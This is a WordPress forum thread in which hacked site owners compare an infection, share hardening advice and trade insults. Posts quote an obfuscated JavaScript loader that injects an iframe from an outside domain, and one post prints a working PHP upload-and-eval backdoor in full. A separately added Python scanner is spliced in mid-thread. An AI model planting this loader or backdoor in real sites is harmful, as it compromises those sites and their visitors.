got hacked (58 posts)

  1. zikzak
    Member
    Posted 6 years ago #

    hi,
    the following script had been inserted into my blog:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    After the insertion my website only displayed a white screen and a popup to run ActiveX was appearing. In the bottom left of the browser I was seeing a weird link saying: http://www.wp-stats-php.info/iframe/wp-stats.php
    I opened the source file and I saw that the script is found at the top and the bottom.
    I checked all my theme PHP files and the script was also there, and in my config.php and index.php too, so I deleted the script from every file where it was inserted. The problem was solved.

    NOW THE QUESTION IS HOW WAS THIS SCRIPT INSERTED AND HOW CAN IT BE AVOIDED?

    I am using wordpress 2.5 with the following plugins:
    -scf2-contact-form
    -simplemodal-contact-form-smcf
    -ibox
    -dailytop10

    thanks in advance for any clarification

  2. clarkeian
    Member
    Posted 6 years ago #

    I also just got hacked like this. We don't seem to have any plugins in-common, but I found that a lot of PHP files contained the following:

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    Very scary...

  3. elorgwhee
    Member
    Posted 6 years ago #

    I was hacked just today as well with the same symptoms mentioned above (the ActiveX and the wp-stats, etc). This appears to be almost a bi-monthly thing and my friends and I started to suspect some sort of vulnerability in the theme I'm using (Hemmingway) - though this particular problem is new. Normally the posts are hacked with some sort of sql injection that causes the rest of the site to not load. It's not normally this bad.

    This was inserted into the bottom of ALL of my pages - they even got the 404.php! I'm going through and removing all the code now. It looks like I can't even load /wp-admin/ either??

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

    I have the following plugins:
    Akismet
    Awesomnews (not used or active though)
    maintenance mode
    pownce-for-wordpress (not yet used or active I don't think - can't confirm cuz I'm still cleaning up the code so I can login)
    wordpress-automatic-upgrade
    hello dolly
    stats

    They even got my plugins php files?!?
    I also found some "pre_hello.php" file in my plugins directory. It looks like 3 pages of stuff - the first and last are all just carriage returns while the middle is code with lots of "testdata" bits.

  4. clarkeian
    Member
    Posted 6 years ago #

    The only plugin we have in common is Akismet.

    I've done a fresh install and deactivated all plugins except Akismet. Could this be a hole in WordPress itself?

  5. BouncinDave
    Member
    Posted 6 years ago #

    It's not just wordpress

    2 of my Joomla! installs have had the same problem, and one of my wordpress installs...

    Any solution other than wiping and reinstalling?

  6. elorgwhee
    Member
    Posted 6 years ago #

    Looks like they tagged all the php files - and even the files like the readme.html - though that file obviously doesn't have the <?php tags in it.

    There are these seemingly random files that start with pre_ that don't appear to have any normal wordpress code in them. They have the page of blank space at the top and bottom. Looks like they found another php file and created a new file with that name but added "pre_" to the beginning?? "pre_hello.php" in the plugins directory, "pre_wp-cron.php" in the root directory...

    Here's the code:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','b40395b7ce76774c614419fbeb3dd9a9');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

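
A defender-side triage script, added here as an example and not code from the thread or from WordPress: it decodes the shifted "count" loader the posters quote (posts 1 to 3) and flags the pre_*.php files described in post 6. The file-walking helper, the eval/tmp_name heuristic and the sample names are my own assumptions about what to look for, not something the thread specifies.

```python
import re
import sys
from pathlib import Path

# Signature of the loader quoted in the thread: a JS "count" function that
# rebuilds a string by shifting every character code down by 2 and then
# document.write()s it. Group 1 captures the obfuscated argument.
INJECT_RE = re.compile(
    r'function count\(str\).*?String\.fromCharCode\(n - \(2\)\).*?'
    r'document\.write\(count\("(.*?)"\)\)', re.S)

def decode_shift2(obfuscated: str) -> str:
    """Undo the +2 shift. The JS literal backslash-escapes embedded quotes,
    so unescape first; a quote (34) then decodes to a space (32)."""
    return "".join(chr(ord(c) - 2) for c in obfuscated.replace('\\"', '"'))

def scan_text(name: str, text: str) -> list:
    """Return findings for one file, given its name and contents."""
    findings = []
    for m in INJECT_RE.finditer(text):
        findings.append("injected loader writes: " + decode_shift2(m.group(1)))
    # Dropper files in the thread were named pre_<existing file>.php.
    if name.startswith("pre_") and name.endswith(".php"):
        findings.append("suspicious pre_*.php file")
    # Assumed heuristic: the posted backdoor eval()s an uploaded temp file,
    # a pairing worth reviewing wherever it appears in a web root.
    if "eval(" in text and "tmp_name" in text:
        findings.append("eval() of an uploaded file: backdoor pattern")
    return findings

def scan_tree(root: str) -> dict:
    """Walk an install; map relative path -> findings, only for files that hit."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in (".php", ".html", ".js"):
            found = scan_text(path.name, path.read_text(errors="replace"))
            if found:
                hits[str(path.relative_to(root))] = found
    return hits

# Constructed sample: one copy of the loader exactly as quoted in the thread.
SAMPLE_INJECTED = r'''<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for rel, found in scan_tree(sys.argv[1]).items():
            print(rel, *found, sep="\n  ")
    else:
        print(*scan_text("index.php", SAMPLE_INJECTED), sep="\n")
```

Run it with the path of the web root as the only argument to list every file that still carries the loader or the dropper, which is the list the posters were compiling by hand.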
  7. Ivovic
    Member
    Posted 6 years ago #

    if you've been hacked on a previous version, and then upgraded to wp2.5.1, chances are you didn't clear out all your files from your hosting space, and whatever was planted there by your hackers is still there.

    a fresh install doesn't mean anything if you have not changed your passwords to *everything* including the DB and all privileged user accounts on your blog, or if you allowed any files to remain on your hosting space when you uploaded this fresh copy of wordpress.

    the other possibility of course, is that your shared hosting environment is poorly configured to allow your neighbours to write into your space. In that case, no matter what you do, if Joe next door is hacked, so are you.

  8. elorgwhee
    Member
    Posted 6 years ago #

    Another update -
    Is anyone running Vanilla forum? If it started in wordpress, then it "leaked" into my forum as well. This is going to take forever to clean up.

  9. elorgwhee
    Member
    Posted 6 years ago #

    @Ivovic -
    Yeah, I'm currently working on fresh installs with all new passwords, etc., on a new server. Hopefully this will help. (So far?) it's only my old install on my old server.

  10. zikzak
    Member
    Posted 6 years ago #

    so where are the wordpress people??

    do we have to stay afraid of hackers every time a new version comes up??

    And any solution to this problem now?

    **All my 4 domains hosted under the same account (not all using wordpress) are now down because some guys working on wordpress didn't have time to check their code for bugs!

  11. clarkeian
    Member
    Posted 6 years ago #

    What I'm more interested in is how they got in in the first place. I've asked our sysadmin, who is pretty good at hunting down this sort of thing, to investigate our logs.

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

  12. whooami
    Member
    Posted 6 years ago #

    just to inject something, pardon the pun, a plugin not being active has no bearing on whether or not it's exploitable. An exploitable plugin isn't any less exploitable because it's not active.

  13. whooami
    Member
    Posted 6 years ago #

    So where are the wordpress people??

    do we have to stay afraid of hackers every time a new version comes up??

    And any solution to this problem now?

    **All my 4 domains hosted under the same account (not all using wordpress) are now down because some guys working on wordpress didn't have time to check their code for bugs!

    That's such crap.

    I am using wordpress 2.5 with the following plugins:

    Maybe instead of JUST joining this forum after you have been hacked, you should have been paying more attention.

    http://wordpress.org/development/2008/04/wordpress-251/

    Your complaint is moot dude, you aren't even running a current version.

  14. BouncinDave
    Member
    Posted 6 years ago #

    I'm talking to my server admin, and it's apparently being caused by something from http://www.wp-stats-php.info/

    Since I can't get to my admin panel I cannot tell you what file it is that does this.

  15. zikzak
    Member
    Posted 6 years ago #

    @whooami, instead of wasting ur time evaluating how bad my comment is, why don't you go spend ur time finding a solution to the problem? I think it's more useful for u.. who knows, u may become a wordpress hero babe!

  16. whooami
    Member
    Posted 6 years ago #

    how about you drop dead, babe. Sounds like you're the one that needs to find the solution.

    I never thought that I would think this, much less say it, but some people get what they deserve I guess. If you cannot be bothered to spend the little fucking time it takes to read the crap on your dashboard, and actually click a cpl links, then you have little right to come here and bash the people that work on this software. You're a non-factor.

  17. Ivovic
    Member
    Posted 6 years ago #

    lemme jump in on the dogpile too...

    The real problem here is PHP itself, it makes it way too easy to build websites with hard-to-find vulnerabilities, so much so that even experienced PHP coders like those at WordPress screw up periodically.

    "easy to build websites with hard to find vulnerabilities"

    I'm surprised the universe didn't implode when you said that. If it's easy to build... then surely it's easier to find the vulnerabilities than if it were HARD to build with it, right?

    What's your point anyway? You want something absolutely bug-free? Sorry it doesn't exist.

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it's great. That's the same reason the hackers are after it.

    Deal, or switch to a publishing platform nobody's ever heard of. It won't be any more secure, but you'll feel safer because you don't have a big red target painted on your ass.

    Trade ease of use, compatibility and extensibility for obscurity, then we'll see you on their forum complaining that they don't have as many nice features as wordpress.

  18. Joni
    Member
    Posted 6 years ago #

    **All my 4 domains hosted under the same account (not all using wordpress) are now down because some guys working on wordpress didn't have time to check their code for bugs!

    Nope. That dog won't hunt. Your sites are down because you are probably on a shared server. It's only as safe as the least secure user on it. That very well might be you, given your stunning ignorance of your situation, but it might be someone else on that shared server.

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites ... well it just leaves me speechless. People are hacked not because they are running WordPress, but because of PHP vulnerabilities. So it's not just a WordPress issue.

    And yeah, upgrade your damn installs when you are supposed to and spare yourself (and the rest of us) some grief.

  19. Ivovic
    Member
    Posted 6 years ago #

    general unsolicited advice:

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wondrous new possibilities.

    2) keep your wordpress up-to-date. It's not easy if you like to tinker, but do it anyway.

    3) research your plugins before you upload them, see if people have had any security issues with them.

    4) keep your plugins updated, and actually remove any plugins you don't intend to use, don't just deactivate them.

    5) read this, then read it again.

    6) actually DO what it says once you've read it.

  20. Ivovic
    Member
    Posted 6 years ago #

    That dog won't hunt

    wow, that's a real saying? I thought Dr Phil was just talking out of his arse, I didn't realise all texans did it :P~~

  21. zikzak
    Member
    Posted 6 years ago #

    Blaming WordPress for every problem you are experiencing with your WordPress and non-WordPress sites

    the hack was made just after some days of the launch of a new wordpress powered website

  22. Joni
    Member
    Posted 6 years ago #

    Yep. And while we're at it:
    Y'all .. singular
    All y'all .. plural :-P

  23. Joni
    Member
    Posted 6 years ago #

    Zikzak, that could well just be a coincidence. The problem is, as I said, that in a shared hosting environment, you just can't ever be certain HOW a hacker gained access to your site and its files. Even if he used WP to hack your site, that doesn't necessarily mean he gained access to the server through YOU.

    Please do read the link that Ivovic posted above.

    The biggest problem I see with WP hackery and why it's so attractive is that there are just scads of folks out there new to the web, new to having their own server space, new to WordPress, who just slap WordPress up (often via Fantastico), and then don't think another thing about it. They don't familiarize themselves with even the most BASIC concepts of site security. This is a hacker's dream come true. So unless the unwashed WP masses out there EDUCATE THEMSELVES (knowledge has been and always will be power, people!), this won't abate.

  24. Ivovic
    Member
    Posted 6 years ago #

    my all-time favourite southernism is "all y'all" ;)

    as in "all y'all should get to readin' about wordpress security"

  25. whooami
    Member
    Posted 6 years ago #

    1) pay $5 more per month and use a VPS. Having your own apartment is nicer, plus you discover wondrous new possibilities.

    hahah, yeah, right -- that's advice that's going nowhere. We are largely, as Joni says, dealing with squabs. Cheap squabs, too. (and no you can't have that word as it relates to WP, I plan on using it :P).

    besides, being on shared hosting isn't a problem, prima facie. LOTS and LOTS of people do just fine on shared hosting, and NEVER have these sorts of problems.

  26. Ivovic
    Member
    Posted 6 years ago #

    that *is* true, but with people running around chmodding everything to 777... that's gotta be reaching critical mass at some point.

    Anyway, that point wasn't *just* about security, it is much nicer having a certain amount of allocated cpu and ram, especially now that wordpress is getting a little hungrier.

    I agree with you though... a) it's not the most important point I've ever made, and b) none of these guys want to pay that much per year, let alone per month.

  27. whooami
    Member
    Posted 6 years ago #

    that *is* true, but with people running around chmodding everything to 777... that's gotta be reaching critical mass at some point.

    that's why those of us that are not squabs get off those shared hosts. I am all for squab-webhosting.com setting up shop.

    Let them chmod 777 all they want. :)

    Eventually, those people will all end up back here.

  28. Ivovic
    Member
    Posted 6 years ago #

    squabsr.us is available ;)

  29. deuced
    Member
    Posted 6 years ago #

    [offtopic]Sorry to interfere but a VPS isn't a solution. A good shared hosting in a good hosting company is IMHO a lot safer than a cheap VPS in a bad hosting company. Especially when most people CANNOT administrate a server! That's a hacker's dream![/offtopic]

  30. whooami
    Member
    Posted 6 years ago #

    deuced, that is so true.

    ivovic, dude! I just found a better one that's available, wanna go into bidness?

Topic Closed

This topic has been closed to new replies.